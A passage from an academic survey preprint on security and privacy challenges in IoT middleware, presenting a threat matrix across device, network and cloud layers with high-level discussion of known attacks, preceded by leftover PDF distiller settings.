<FEFF005500740069006c006900730065007a00200063006500730020006f007000740069006f006e00730020006100660069006e00200064006500200063007200e900650072002000640065007300200064006f00630075006d0065006e00740073002000410064006f00620065002000500044004600200070006f007500720020006400650073002000e90070007200650075007600650073002000650074002000640065007300200069006d007000720065007300730069006f006e00730020006400650020006800610075007400650020007100750061006c0069007400e90020007300750072002000640065007300200069006d007000720069006d0061006e0074006500730020006400650020006200750072006500610075002e0020004c0065007300200064006f00630075006d0065006e00740073002000500044004600200063007200e900e90073002000700065007500760065006e0074002000ea0074007200650020006f007500760065007200740073002000640061006e00730020004100630072006f006200610074002c002000610069006e00730069002000710075002700410064006f00620065002000520065006100640065007200200035002e0030002000650074002000760065007200730069006f006e007300200075006c007400e90072006900650075007200650073002e> /ITA <FEFF005500740069006c0069007a007a006100720065002000710075006500730074006500200069006d0070006f007300740061007a0069006f006e00690020007000650072002000630072006500610072006500200064006f00630075006d0065006e00740069002000410064006f006200650020005000440046002000700065007200200075006e00610020007300740061006d007000610020006400690020007100750061006c0069007400e00020007300750020007300740061006d00700061006e0074006900200065002000700072006f006f0066006500720020006400650073006b0074006f0070002e0020004900200064006f00630075006d0065006e007400690020005000440046002000630072006500610074006900200070006f00730073006f006e006f0020006500730073006500720065002000610070006500720074006900200063006f006e0020004100630072006f00620061007400200065002000410064006f00620065002000520065006100640065007200200035002e003000200065002000760065007200730069006f006e006900200073007500630063006500730073006900760065002e> /JPN <FEFF9ad854c18cea51fa529b7528002000410064006f0062006500200050004400460020658766f8306e4f5c6210306b4f7f75283057307e30593002537052376642306e753b8cea3092670059279650306b4fdd306430533068304c3067304d307e3059300230c730b930af30c830c330d730d730ea30f330bf3067306e53705237307e305f306f30d730eb30fc30d57528306b9069305730663044307e305930023053306e8a2d5b9a30674f5c62103055308c305f0020005000440046002030d530a130a430eb306f3001004100630072006f0062006100740020304a30883073002000410064006f00620065002000520065006100640065007200200035002e003000204ee5964d3067958b304f30533068304c3067304d307e30593002> /KOR <FEFFc7740020c124c815c7440020c0acc6a9d558c5ec0020b370c2a4d06cd0d10020d504b9b0d1300020bc0f0020ad50c815ae30c5d0c11c0020ace0d488c9c8b85c0020c778c1c4d560002000410064006f0062006500200050004400460020bb38c11cb97c0020c791c131d569b2c8b2e4002e0020c774b807ac8c0020c791c131b41c00200050004400460020bb38c11cb2940020004100630072006f0062006100740020bc0f002000410064006f00620065002000520065006100640065007200200035002e00300020c774c0c1c5d0c11c0020c5f40020c2180020c788c2b5b2c8b2e4002e> /NLD (Gebruik deze instellingen om Adobe PDF-documenten te maken voor kwaliteitsafdrukken op desktopprinters en proofers. De gemaakte PDF-documenten kunnen worden geopend met Acrobat en Adobe Reader 5.0 en hoger.) /NOR <FEFF004200720075006b00200064006900730073006500200069006e006e007300740069006c006c0069006e00670065006e0065002000740069006c002000e50020006f0070007000720065007400740065002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740065007200200066006f00720020007500740073006b00720069006600740020006100760020006800f800790020006b00760061006c00690074006500740020007000e500200062006f007200640073006b0072006900760065007200200065006c006c00650072002000700072006f006f006600650072002e0020005000440046002d0064006f006b0075006d0065006e00740065006e00650020006b0061006e002000e50070006e00650073002000690020004100630072006f00620061007400200065006c006c00650072002000410064006f00620065002000520065006100640065007200200035002e003000200065006c006c00650072002000730065006e006500720065002e> /PTB <FEFF005500740069006c0069007a006500200065007300730061007300200063006f006e00660069006700750072006100e700f50065007300200064006500200066006f0072006d00610020006100200063007200690061007200200064006f00630075006d0065006e0074006f0073002000410064006f0062006500200050004400460020007000610072006100200069006d0070007200650073007300f5006500730020006400650020007100750061006c0069006400610064006500200065006d00200069006d00700072006500730073006f0072006100730020006400650073006b0074006f00700020006500200064006900730070006f00730069007400690076006f0073002000640065002000700072006f00760061002e0020004f007300200064006f00630075006d0065006e0074006f00730020005000440046002000630072006900610064006f007300200070006f00640065006d0020007300650072002000610062006500720074006f007300200063006f006d0020006f0020004100630072006f006200610074002000650020006f002000410064006f00620065002000520065006100640065007200200035002e0030002000650020007600650072007300f50065007300200070006f00730074006500720069006f007200650073002e> /SUO <FEFF004b00e40079007400e40020006e00e40069007400e4002000610073006500740075006b007300690061002c0020006b0075006e0020006c0075006f0074002000410064006f0062006500200050004400460020002d0064006f006b0075006d0065006e007400740065006a00610020006c0061006100640075006b006100730074006100200074007900f6007000f60079007400e400740075006c006f0073007400750073007400610020006a00610020007600650064006f007300740075007300740061002000760061007200740065006e002e00200020004c0075006f0064007500740020005000440046002d0064006f006b0075006d0065006e00740069007400200076006f0069006400610061006e0020006100760061007400610020004100630072006f0062006100740069006c006c00610020006a0061002000410064006f00620065002000520065006100640065007200200035002e0030003a006c006c00610020006a006100200075007500640065006d006d0069006c006c0061002e> /SVE <FEFF0041006e007600e4006e00640020006400650020006800e4007200200069006e0073007400e4006c006c006e0069006e006700610072006e00610020006f006d002000640075002000760069006c006c00200073006b006100700061002000410064006f006200650020005000440046002d0064006f006b0075006d0065006e00740020006600f600720020006b00760061006c00690074006500740073007500740073006b0072006900660074006500720020007000e5002000760061006e006c00690067006100200073006b0072006900760061007200650020006f006300680020006600f600720020006b006f007200720065006b007400750072002e002000200053006b006100700061006400650020005000440046002d0064006f006b0075006d0065006e00740020006b0061006e002000f600700070006e00610073002000690020004100630072006f0062006100740020006f00630068002000410064006f00620065002000520065006100640065007200200035002e00300020006f00630068002000730065006e006100720065002e> /ENU (Use these settings to create Adobe PDF documents for quality printing on desktop printers and proofers. Created PDF documents can be opened with Acrobat and Adobe Reader 5.0 and later.) >> /Namespace [ (Adobe) (Common) (1.0) ] /OtherNamespaces [ << /AsReaderSpreads false /CropImagesToFrames true /ErrorControl /WarnAndContinue /FlattenerIgnoreSpreadOverrides false /IncludeGuidesGrids false /IncludeNonPrinting false /IncludeSlug false /Namespace [ (Adobe) (InDesign) (4.0) ] /OmitPlacedBitmaps false /OmitPlacedEPS false /OmitPlacedPDF false /SimulateOverprint /Legacy >> << /AddBleedMarks false /AddColorBars false /AddCropMarks false /AddPageInfo false /AddRegMarks false /ConvertColors /NoConversion /DestinationProfileName () /DestinationProfileSelector /NA /Downsample16BitImages true /FlattenerPreset << /PresetSelector /MediumResolution >> /FormElements false /GenerateStructure true /IncludeBookmarks false /IncludeHyperlinks false /IncludeInteractive false /IncludeLayers false /IncludeProfiles true /MultimediaHandling /UseObjectSettings /Namespace [ (Adobe) (CreativeSuite) (2.0) ] /PDFXOutputIntentProfileSelector /NA /PreserveEditing true /UntaggedCMYKHandling /LeaveUntagged /UntaggedRGBHandling /LeaveUntagged /UseDocumentBleed false >> ] >> setdistillerparams << /HWResolution [2400 2400] /PageSize [612.000 792.000] >> setpagedevice work_pijwwvfoivdarkphykmuwwhuyi ---- A survey of secure middleware for the Internet of Things A peer-reviewed version of this preprint was published in PeerJ on 8 May 2017. View the peer-reviewed version (peerj.com/articles/cs-114), which is the preferred citable publication unless you specifically need to cite this preprint. Fremantle P, Scott P. 2017. A survey of secure middleware for the Internet of Things. PeerJ Computer Science 3:e114 https://doi.org/10.7717/peerj-cs.114 https://doi.org/10.7717/peerj-cs.114 https://doi.org/10.7717/peerj-cs.114 A survey of secure middleware for the Internet of Things Paul Fremantle1 and Philip Scott1 1University of Portsmouth, Portsmouth, UK ABSTRACT The rapid growth of small Internet connected devices, known as the Internet of Things (IoT), is creating a new set of challenges to create secure, private infrastructures. This paper reviews the current literature on the challenges and approaches to security and privacy in the Internet of Things, with a strong focus on how these aspects are handled in IoT middleware. We focus on IoT middleware because many systems are built from existing middleware and these inherit the underlying security properties of the middleware framework. The paper is composed of three main sections. Firstly, we propose a matrix of security and privacy threats for IoT. This matrix is used as the basis of a widespread literature review aimed at identifying requirements on IoT platforms and middleware. Secondly, we present a structured literature review of the available middleware and how security is handled in these middleware approaches. We utilise the requirements from the first phase to evaluate. Finally, we draw a set of conclusions and identify further work in this area. Keywords: Security, Privacy, Internet of Things, IoT, Middleware INTRODUCTION The Internet of Things (IoT) was originally coined as a phrase by Kevin Ashton in 1990 [14], with reference to “taggable” items that used Radio Frequency Identification Devices (RFID) to become electronically identifiable and therefore amenable to interactions with the Internet. With the ubiquity of cheap processors and System-on-Chip based devices, the definition has expanded to include wireless and Internet-attached sensors and actuators, including smart meters, home automation systems, Internet- attached set-top-boxes, smartphones, connected cars, and other systems that connect the physical world to the Internet either by measuring it or affecting it. There are a number of definitions of IoT. For the purposes of this work, we will define it in the following way. An IoT device is a system that contains either sensors or actuators or both and supports connection to the Internet either directly or via some intermediary. A sensor is a subcomponent of a device that measures some part of the world, allowing the device to update Internet and Cloud systems with this information. A sensor may be as simple as a button (e.g. Amazon Dash Button), but more complex sensors widely deployed include weather sensors (barometers, anemometers, thermometers), accelerometers and GPS units, light sensors, air quality sensors, people-counters, as well as medical sensors (blood sugar, heart rate, etc), industrial sensors (production line monitoring, etc) and many more. Actuators are electronically controlled systems that affect the physical world. These includes lights, heaters, locks, motors, pumps, relays and so forth. Therefore the IoT is the network of such devices together with the Internet systems that are designed to interoperate and communicate with those devices, including the websites, cloud servers, gateways and so forth. The number of IoT devices has grown rapidly, with a recent estimate suggesting that there were 12.5 billion Internet attached devices in 2010 and a prediction of 50 billion devices by 2020 [66]. This brings with it multiple security challenges: • These devices are becoming more central to people’s lives, and hence the security is becoming more important. • Many IoT devices collect Personally Identifiable Information (PII) which may lead to potential privacy concerns. PeerJ Preprints | https://doi.org/10.7287/peerj.preprints.1241v2 | CC BY 4.0 Open Access | rec: 7 Mar 2017, publ: 7 Mar 2017 • Because devices can affect the physical world, there are potential attacks that may have greater impact than purely virtual attacks. • These devices, due to size and power limitations, may not support the same level of security that we would expect from more traditional Internet connected systems. • The sheer scale and number of predicted devices will create new challenges and require new approaches to security. Because of the pervasive and personal nature of IoT, privacy and security are important areas for research. In 2016, more than 100,000 IoT devices were conjoined into a hostile botnet named Mirai that attacked the DNS servers of the east coast of the US [193]. The total attack bandwidth of this system was measured at more than 600Gbps. In fact, the number of devices attacked was a small number compared to the potential: previous research [51] has identified several million devices that are available for attack. Therefore there is a strong motivation to find approaches to improve and enhance the security and privacy of the IoT. Many IoT projects use existing platforms, also known as middleware to build upon. The Oxford English Dictionary [55] defines middleware as: Software that acts as a bridge between an operating system or database and applications, especially on a network. Such systems can either improve security or reduce it: if the platform is built with privacy and security in mind then such systems can embed best-practices and enable system designers to rapidly create secure systems. If platforms are built without security, or security is added as an after-thought, then it is possible that not only does the platform encourage the creation of insecure, privacy-negating systems, but also that it may make it more difficult to add security when problems are found. The creation of systems with security and privacy as a key design principle is known as Privacy By Design (PBD) [43]. The rest of this work is laid out as follows. In section 1 we outline the research approach and methodology used for the survey. In section 2 we evaluate threats for security and privacy using a matrix model. In section 3, we use a three-layer model to evaluate IoT privacy. From these models we present a set of requirements for IoT privacy and security in section 4. In section 5 we outline the structured survey of IoT middleware systems. In section 6, we identify 19 secure middleware systems and look at the security and privacy characteristics of each, using the previously identified requirements as a guide. In section 7 we summarise the findings of the survey. Finally, in section 8 we look at the conclusions, contributions and further work in this area. 1 APPROACH AND METHODOLOGY In order to understand the security threats against the Internet of Things, we need to take an approach to classifying threats. The most widely used ontology of security threats is the Confidentiality Integrity Availability (CIA) triad [141] which has been extended over the years. The extended ontology is referred to as the “CIA Plus” (CIA+) model [169]. In the course of reviewing the available literature and approaches to IoT security, we have created a proposed expansion of the existing framework that we believe works better in the IoT space. In particular, we propose a new ontology based on a matrix of evaluation where we look at each of the classic security challenges in three different aspects: device/hardware, network, and cloud/server-side. In some cells in this matrix, we have not identified any areas where the IoT space presents new challenges: in other words, whilst the domain space covered by these cells contains security challenges, those challenges are no different from existing Web and Internet security challenges in that domain. In those cells we can say that the challenges are “unchanged”. In other cells we specifically identify those challenges that are significantly modified by the unique nature of the Internet of Things. In addition to the matrix, we utilise the Three Layer Privacy Model from [173] to explore privacy concerns in more detail. Together, the matrix and three-layer model are then used to inform a set of requirements on IoT middleware. In the second part of this work, we use a structured survey methodology to identify a set of middleware designed to support IoT systems. We start with a specific set of search terms used against a meta-search engine to search across multiple databases. Then we reviewed the abstracts of each identified paper and from these we identified a number of middleware systems. Once the middleware systems we identified, we did not confine ourselves to the identified papers but also reviewed Open Source code, 2/34 Security Characteristic ! A. Device / Hardware! B. Network! C. Cloud / Server- Side ! 1. Confidentiality ! A1. Hardware attacks! ! B1. Encryption with low capability devices ! C1. Privacy! Data leaks ! Fingerprinting! 2. Integrity ! A2. Spoofing;! Lack of attestation! B2. Signatures with low capability devices! Sybil attacks! C2. No common device Identity! ! 3. Availability! A3. Physical attacks;! B3. Unreliable networks, DDoS, Radio jamming! C3. DDoS! (as usual)! 4. Authentication! A4. Lack of UI, ! Default Passwords,! Hardware secret retrieval! B4. Default Passwords, lack of secure identities! C4. No common device identity, insecure flows ! 5. Access Control! A5. Physical access;! Lack of local authentication ! B5. Lightweight distributed protocols for Access Control ! C5. Inappropriate use of traditional ACLs, ! Device Shadow ! 6. Non-Repudiation! A6. No secure local storage; No attestation, forgery ! B6. Lack of Signatures with low capability devices! C6. Lack of secure identity and signatures ! ! Table 1. Matrix of security challenges for the IoT architecture documents and other resources. We evaluate each of the middleware systems against the identified requirements from the matrix evaluation. The contributions of this paper are: • A matrix model for evaluating threats to IoT systems. • A structured literature review of security of middleware systems for IoT. 2 MATRIX EVALUATION Table 1 shows the matrix we will use for evaluating security challenges. In each cell we summarise the main challenges that are different in the IoT world or at least exacerbated by the challenges of IoT compared to existing Internet security challenges. We will explore each cell in the matrix in detail below. Each of the cells is given a designation from A1 to C6 and these letters are used as a key to refer to the cells below. The three aspects (Hardware/Device, Network, Cloud/Server) were chosen because as we read the available literature these areas became clear as a way of segmenting the unique challenges within the context of the IoT. These form a clear logical grouping of the different assets involved in IoT systems. We will provide a quick overview of each area before we look in detail at each cell of the matrix. 3/34 Device and Hardware IoT devices have specific challenges that go beyond those of existing Internet clients. These challenges come from: the different form factors of IoT devices, from the power requirements of IoT devices, and from the hardware aspects of IoT devices. The rise of cheap mobile telephony has driven down the costs of 32-bit processors (especially those based around the ARM architec- ture [74]), and this is increasingly creating lower cost microcontrollers and System-on-Chip (SoC) devices based on ARM. However, there are still many IoT devices built on 8-bit processors, and occasionally, 16-bit [190]. In particular the open source hardware platform Arduino [12] supports both 8-bit and 32-bit controllers, but the 8-bit controllers remain considerably cheaper and at the time of writing are still widely used. The challenges of low-power hardware mean that certain technologies are more or less suitable. In the details of each cell below we will address specific details as they pertain to security. In addition, there are specific protocols and approaches designed for IoT usage that use less power and are more effective. In [77] there is a comparison of eXtensible Markup Language (XML) parsing with binary alternatives. The processing time on a constrained device is more than a magnitude slower using XML, and that the heap memory used by XML is more than 10Kb greater than with binary formats. These improvements result in a 15% saving in power usage in their tests. XML security standards such as XML Encryption and the related WS-Encryption standard have significant problems in an IoT device model. For example, any digital signature in XML Security needs a process known as XML Canonicalisation (XML C14N). XML Canonicalisation is a costly process in both time and memory. [32] shows that the memory usage is more than 10× the size of the message in memory (and XML messages are already large for IoT devices). We looked for any work on implementing WS-Security on Arduino, ESP8266 or Atmel systems (which are common targets for IoT device implementations) without success. XML performance on small devices can be improved using Efficient XML Interchange (EXI), which reduces network traffic [104]. Network IoT devices may use much lower power, lower bandwidth networks than existing Internet systems. Cellular networks often have much higher latency and more “dropouts” than fixed networks [44]. The protocols that are used for the Web are often too data-intensive and power-hungry for IoT devices. Network security approaches such as encryption and digital signatures are difficult and in some cases impractical in small devices. New low-power, low-bandwidth networks such as LoRaWan 1 are gaining significant traction. There have been some limited studies comparing the power usage of different protocols. In [104] there is comparison of using Constrained Application Protocol (CoAP) with EXI against HyperText Transfer Protocol (HTTP), showing efficiency gains in using CoAP. In [130], MQTT over TLS is shown to use less power than HTTP over TLS in several scenarios. In [], there is a comparison of network traffic between CoAP and Message Queueing Telemetry Transport (MQTT) showing that each performs better in different scenarios, with similar overall performance. This is an area where more study is clearly needed, but we can draw conclusions that traditional protocols such as Simple Object Access Protocol (SOAP)/HTTP are unsuited to IoT usage. Cloud/Server-Side While many of the existing challenges apply here, there are some aspects that are exacerbated by the IoT for the server-side or cloud infrastructure. These include: the often highly personal nature of data that is being collected and the requirement to manage privacy; the need to provide user-managed controls for access; and the lack of clear identities for devices making it easier to spoof or impersonate devices. 2.1 A1. Device Confidentiality Hardware devices have their own challenges for security. There are systems that can provide tamper- proofing and try to minimise attacks, but if an attacker has direct access to the hardware, they can often break it in many ways. For example, there are devices that will copy the memory from flash memory into another system (known as NAND Mirroring). Code that has been secured can often be broken with 1https://www.lora-alliance.org/ 4/34 Scanning Electron Microscopes. Skorobogatov from Cambridge University has written a comprehensive study [171] of many semi-invasive attacks that can be done on hardware. Another common attack is called a side-channel attack [196, 112] where the power usage or other indirect information from the device can be used to steal information. This means that it is very difficult to protect secrets on a device from a committed attacker. A specific outcome of this is that designers should not rely on obscurity to protect devices. A clear example of this was the Mifare card used as the London Oyster card and for many other authentication and smart-card applications. The designers created their own cryptographic approach and encryption algorithms. Security researchers used a number of techniques to break the obscurity, decode the algorithm, find flaws in it and create a hack that allowed free transport in London as well as breaking the security on a number of military installations and nuclear power plants [75]. Similarly, relying on the security of a device to protect a key that is used across many devices is a significant error. For example, the encryption keys used in DVD players and XBoX gaming consoles [174] were broken meaning that all devices were susceptible to attack. A related issue to confidentiality of the data on the device is the challenges inherent in updating devices and pushing keys out to devices. The use of Public Key Infrastructure (PKI) requires devices to be updated as certificates expire. The complexity of performing updates on IoT devices is harder, especially in smaller devices where there is no user interface. For example, some devices need to be connected to a laptop in order to perform updates. Others need to be taken to a dealership or vendor. The distribution and maintenance of certificates and public-keys onto embedded devices is complex [192]. In [134] a novel approach to supporting mutual authentication in IoT networks is proposed. However, this model assumes that each device has a secure, shared key (called kIR already deployed and managed into every device. As discussed above, ensuring this key is not compromised is a challenge, as the authors admit: “However, further research is required to realize the secure sharing of kIR.” In addition, sensor networks may be connected intermittently to the network resulting in limited or no access to the Certificate Authority (CA). To address this, the use of threshold cryptographic systems that do not depend on a single central CA has been proposed [197], but this technology is not widely adopted: in any given environment this would require many heterogeneous Things to support the same threshold cryptographic approach. This requires human intervention and validation, and in many cases this is another area where security falls down. For example, many situations exist where security flaws have been fixed but because devices are in homes, or remote locations, or seen as appliances rather than computing devices, updates are not installed [90]. The Misfortune Cookie [143] demonstrates that even when security fixes are available, some manufacturers do not make them available to customers and continue to ship insecure systems. It is clear from the number of publicised attacks [115, 96, 90] that many device designers have not adjusted to the challenges of designing devices that will be connected either directly or indirectly to the Internet. A further security challenge for confidentiality and hardware is the fingerprinting of sensors or data from sensors. In [35] it has been shown that microphones, accelerometers and other sensors within devices have unique “fingerprints” that can uniquely identify devices. Effectively there are small random differences in the physical devices that appear during manufacturing that can be identified and used to recognise individual devices across multiple interactions. 2.2 B1: Network Confidentiality The confidentiality of data on the network is usually protected by encryption of the data. There are a number of challenges with using encryption in small devices. Performing public key encryption on 8-bit microcontrollers has been enhanced by the use of Elliptic Curve Cryptography (ECC) [98, 118]. ECC reduces the time and power requirements for the same level of encryption as an equivalent Rivest, Shamir, and Adleman public key cryptography (RSA) public-key encryption [150] by an order of magnitude [83, 163, 164]: RSA encryption on constrained 8-bit microcontrollers may take minutes to complete, whereas similar ECC-based cryptography completes in seconds. However, despite the fact that ECC enables 8-bit microcontrollers to participate in public-key encryption systems, in many cases it is not used. We can speculate as to why this is: firstly, as evidenced by [164], the encryption algorithms consume a large proportion of the available ROM on small controllers. Secondly, there is a lack of standard open source software. For example, a search that we carried out (on the 21st April 2015) of the popular open source site Github for the words “Arduino” and “Encryption” revealed 10 repositories 5/34 compared to “Arduino” and “HTTP” which revealed 467 repositories. These 10 repositories were not limited to network level encryption. However, recently an open source library for AES on Arduino [101] has made the it more effective to use cryptography on Atmel-based hardware.2 While ECC is making it possible for low-power devices to be more efficient in performing cryptography operations, in 2015 the NSA made an unprecedented warning against ECC 3. We don’t yet know why, as of the time of writing. There are differing theories. One known issue with both Prime Numbers and Elliptic Curves is Quantum Computing. In Quantum computers, instead of each bit being 0 or 1, each qubit allows a superposition of both 0 and 1, allowing Quantum computers to solve problems that are very slow for classical computers in a fraction of the time. At the moment general purpose Quantum computers are very simple and confined to laboratories, but they are increasing in power and reliability. In 1994, Peter Shor identified an algorithm for Quantum Computers [165] that performs prime factorization in polynomial time, which effectively means that most existing Public Key Cryptography (PKC) will be broken once sufficiently powerful Quantum computers come online. Given that most Quantum Computers are as yet ineffective, there is some concern that maybe the problem with ECC is actually based on classical computing, but this is all speculation. One thing that we do know is that ECC is much easier to do on IoT devices, and especially on low-power, 8- or 16-bit systems. Therefore this warning is worrying for IoT developers. Another key challenge in confidentiality is the complexity of the most commonly used encryption protocols. The standard Transport Layer Security (TLS) [56] protocol can be configured to use ECC, but even in this case the handshake process requires a number of message flows and is sub-optimal for small devices as documented in [99]. [137] has argued that using TLS with Pre Shared Key (PSK) improves the handshake. PSK effectively allows TLS to use traditional symmetric cryptography instead of Public Key (assymetric) cryptography. However, they fail to discuss in any detail the significant challenges with using PSK with IoT devices: the fact that either individual symmetric keys need to be deployed onto each device during the device manufacturing process, or the same key re-used. In this case there is a serious security risk that a single device will be broken and thus the key will be available. Some IoT devices use User Datagram Protocol (UDP) instead of the more commonly used Transport Control Protocol (TCP). Both protocols are supported on the Internet. UDP is unreliable, and is typically better suited to local communications on trusted networks. It is more commonly used between IoT devices and gateways rather than directly over the Internet, although, like all generalisations there are exceptions to this rule. TLS only works with TCP, and there is an alternative protocol for UDP. Datagram Transport Layer Security (DTLS) [149] provides a mapping of TLS to UDP networks, by adding retransmission and sequencing which are assumed by TLS. While the combination of DTLS and UDP is lighter-weight than TLS and TCP, there is still a reasonably large RAM and ROM size required for this [95], and this requires that messages be sent over UDP which has significant issues with firewalls and home routers, making it a less effective protocol for IoT applications [18]. There is ongoing work at the IETF to produce an effective profile of both TLS and DTLS for the IoT [181]. A significant area of challenge for network confidentiality in IoT is the emergence of new radio protocols for networking. Previously there were equivalent challenges with Wifi networks as protocols such as Wired Equivalency Privacy (WEP) were broken [39], and there are new attacks on protocols such as Bluetooth Low Energy (BLE) (also known as Bluetooth 4.0). For example, while BLE utilises Advanced Encryption Standard (AES) encryption which has a known security profile, a new key exchange protocol was created, which turns out to be flawed, allowing any attacker present during key exchange to intercept all future communications [152]. One significant challenge for IoT is the length of time it takes for vulnerabilities to be addressed when hardware assets are involved. While the BLE key exchange issues are addressed in the latest revision of BLE, we can expect it to take a very long time for the devices that encode the flawed version in hardware to be replaced, due to the very large number of devices and the lack of updates for many devices. By analogy, many years after the WEP issues were uncovered, in 2011 a study showed that 25% of wifi networks were still at risk [36]. Even without concerning the confidentiality of the data, there is one further confidentiality issue around IoT devices in the network and that is confidentiality of the metadata. Many IoT systems rely on radio transmission and in many cases they can be fingerprinted or identified by the radio signature. 2The same search was repeated on the 10th Feb 2017. The number of repositories for “Arduino” and “Encryption” had grown to 21, while for “Arduino” and “HTTP” had reached 941, demonstrating that support for encryption is growing slowly. 3https://threatpost.com/nsas-divorce-from-ecc-causing-crypto-hand-wringing/115150/ 6/34 For example, Bluetooth and Wifi systems use unique identifiers called MAC address (Media Access Control). These can be identified by scanning, and there have been a number of systems deployed to do that, including in airports and in cities [191]. These systems effectively can follow users geographically around. If the user then connects to a system, that fingerprint can be associated with the user and the previously collected location information can be correlated with that user. In a similar attack, security researchers recently found [158] that they could fingerprint cars based on transmissions from tyre pressure monitors, and in addition that they could drive behind a car and from up to 40 feet away they could signal to the driver that the tyre pressure was dangerously low when in fact it wasn’t. Such an attack could easily be used to get a driver to stop and leave their car. In [144] a theoretical model of traceability of IoT devices and particularly Radio Frequency Identi- fication Device (RFID) systems is proposed in order to prevent unauthorised data being accessible. A protocol that preserves the concept of untraceability is proposed. Many of the same references and issues apply to section B2 where we look at the use of digital signatures with low power devices. 2.3 C1. Cloud confidentiality In the main, the issues around Cloud confidentiality are the same as the issues in non-IoT systems. There are however, some key concerns over privacy that are unique to the Internet of Things. For example, the company Fitbit [67] made data about users sexual activity available and easily searchable online [199] by default. There are social and policy issues regarding the ownership of data created by IoT devices [147, 124]. We address these issues in more detail in the cell C5 where we look at the access control of IoT data and systems in the cloud and on the server-side. A second concern that is exacerbated by the Internet of Things are concerns with correlation of data and metadata, especially around de-anonymisation. In [126] it was shown that anonymous metadata could be de-anonymized by correlating it with other publicly available social metadata. This is a significant concern with IoT data. This is also closely related to the fingerprinting of sensors within devices as discussed in cell A1. An important model for addressing these issues in the cloud are systems that filter, summarise and use stream-processing technologies to the data coming from IoT devices before this data is more widely published. For example, if we only publish a summarised co-ordinate rather than the raw accelerometer data we can potentially avoid fingerprinting de-anonymisation attacks. In addition, an important concern has been raised in the recent past with the details of the government sponsored attacks from the US National Security Agency (NSA) and UK Government Communications Headquarters (GCHQ) that have been revealed by Edward Snowden [41]. These bring up three specific concerns on IoT privacy and confidentiality. The first concern is the revelations that many of the encryption and security systems have had deliberate backdoor attacks added to them so as to make them less secure [102]. The second concern is the revelation that many providers of cloud hosting systems have been forced to hand over encryption keys to the security services [106]. The third major concern is the revelations on the extent to which metadata is utilised by the security services to build up a detailed picture of individual users [23]. The implications of these three concerns when considered in the light of the Internet of Things is clear: a significantly deeper and larger amount of data and metadata will be available to security services and to other attackers who can utilize the same weaknesses that the security services compromise. 2.4 Cell A2: Integrity & Hardware/Device The concept of integrity refers to maintaining the accuracy and consistency of data. In this cell of the matrix, the challenges are in maintaining the device’s code and stored data so that it can be trusted over the lifecycle of that device. In particular the integrity of the code is vital if we are to trust the data that comes from the device or the data that is sent to the device. The challenges here are viruses, firmware attacks and specific manipulation of hardware. For example, [81] describes a worm attack on router and IoT firmware, where each compromised system then compromises further systems, leaving behind a slew of untrustworthy systems. The traditional solution to such problems is attestation [153, 38, 162]. Attestation is important in two ways. Firstly, attestation can be used by a remote system to ensure that the firmware is unmodified and therefore the data coming from the device is accurate. Secondly, attestation is used in conjunction with hardware-based secure storage (Hardware Security Managers, as described in [53]) to ensure that authentication keys are not misused. The model is as follows. 7/34 In order to preserve the security of authentication keys in a machine where human interaction is involved, the user is required to authenticate. Often the keys are themselves encrypted using the human’s password or a derivative of the identification parameters. However, in an unattended system, there is no human interaction. Therefore the authentication keys need to be protected in some other way. Encryption on its own is no help, because the encryption key is then needed and this becomes a circular problem. The solution to this is to store the authentication key in a dedicated hardware storage. However, if the firmware of the device is modified, then the modified firmware can read the authentication key, and offer it to a hacker or misuse it directly. The solution to this is for an attestation process to validate the firmware is unmodified before allowing the keys to be used. Then the keys must also be encrypted before sending them over any network. These attestation models are promoted by groups such the Trusted Computing Group [178], and Samsung Knox [157]. These rely on specialized hardware chips such as the Atmel AT97SC3204 [16] which implement the concept of a Trusted Platform Module (TPM) [120]. There is research into running these for Smart Grid devices [136]. However, whilst there is considerable discussion of using these techniques with IoT, during our literature review we could not find evidence of any real-world devices apart from those based on mobile-phone platforms (e.g. phones and tablets) that implemented trusted computing and attestation. 2.5 Cell B2: Network Integrity Maintaining integrity over a network is managed as part of the public-key encryption models by the use of digital signatures. The challenges for IoT are exactly those we already identified in the cell B1 above where we described the challenges of using encryption from low-power IoT devices. However, there is a further concern with IoT known as the Sybil Attack [57]. A Sybil attack4 is where a peer-to-peer network is taken over when an attacker creates a sufficiently large number of fake identities to persuade the real systems of false data. A Sybil attack may be carried out by introducing new IoT devices into a locality or by suborning existing devices. For example, it is expected that autonomous cars may need to form local ephemeral peer-to-peer networks based on the geography of the road system. A significant threat could be provided if a Sybil attack provided those cars with incorrect data about traffic flows. 2.6 C2: Cloud Integrity The biggest concern in this area is the lack of common concepts and approaches for device identity. Integrity relies on identity - without knowing who or what created data, we cannot trust that data. We address this in cells A4, B4 and C4. One specific aspect of trust in cloud for IoT scenarios is where the device lacks the power to participate in trust and must therefore trust the cloud server. One key example of this is where a blockchain [125] is being used in respect of IoT devices. Blockchains are cryptographically secure ledgers that typically require a significant amount of memory, disk space and processor power to work [33]. These requirements go beyond typical IoT devices and even beyond more powerful systems in IoT networks such as hubs. One option to address this is to use remote attestation, but as yet there is little or no work in this space. 2.7 A3: Hardware Availability One of the significant models used by attackers is to challenge the availability of a system, usually through a Denial of Service (Dos) or Distributed Denial of Service (DDos) attack. DoS attacks and availability attacks are used in several ways by attackers. Firstly, there may be some pure malicious or destructive urge (e.g. revenge, commercial harm, share price manipulation) in bringing down a system. Secondly, availability attacks are often used as a pre-cursor to an authentication or spoofing attack. IoT devices have some different attack vectors for availability attacks. These include resource consumption attacks (overloading restricted devices), physical attacks on devices. A simple availability attack on an IoT device might be to force it to use more power (e.g. by initiating multiple key exchanges over Bluetooth) and thereby draining the battery. Another even more obvious availability challenge would be to simply physically destroy a device if it is left in a public or unprotected area. 4Named after a character in a book who exhibits multiple personality disorder 8/34 2.8 B3. Network Availability There are clearly many aspects of this that are the same as existing network challenges. However, there are some issues that particularly affect IoT. In particular, there are a number of attacks on local radio networks that are possible. Many IoT devices use radio networking (Bluetooth, Wifi, 3G, General Packet Radio Service (GPRS), LoRa and others) and these can be susceptible to radio jamming. In [123] there is a survey of jamming attacks and countermeasures in Wireless Sensor Network (WSN). Another clear area of attack is simply physical access. For example, even wired networks are much more susceptible to physical attacks when the devices are spread widely over large areas. 2.9 C3: Cloud Availability The challenges here are not new. Elsewhere we looked at DoS attacks and DDoS attacks. The biggest challenge here is the use of IoT devices themselves to create the DDoS attack on the server, as in the Mirai botnet. 2.10 A4: Device Authentication We will consider the authentication of the device to the rest of the world in cells B5 and C5. In this cell of the matrix we must consider the challenges of how users or other devices can securely authenticate to the device itself. These are however related: a user may bypass or fake the authentication to the device and thereby cause the device to incorrectly identify itself over the network to other parts of the Internet. Some attacks are very simple: many devices come with default passwords which are never changed by owners. In a 